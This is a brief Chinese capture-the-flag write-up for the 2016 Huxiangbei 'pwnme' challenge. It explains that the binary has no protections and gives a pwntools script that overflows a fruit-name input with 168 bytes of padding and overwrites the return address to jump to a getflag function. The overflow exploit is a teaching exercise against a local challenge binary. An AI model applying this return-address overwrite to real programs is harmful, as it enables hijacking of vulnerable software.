2016 湖湘杯 pwnme

| categories writeups  | tags CTF  pwn 

题目下载链接: pwnme

没有开启任何保护,思路就是利用pattern确定函数返回地址,返回到getflag函数

#!usr/bin/env python

from pwn import *

context.log_level = 'debug'

addr_getflag = 0x08048677
payload = 'A' * 168
payload += p32(addr_getflag)

bin = process('./pwnme')
bin.recvuntil('6. Exit    \n')
bin.sendline('5')
bin.recvuntil('Please input the name of fruit:')
bin.sendline(payload)
bin.recvuntil('you got it...')

flag = bin.recv(100)
print flag

Previous     Next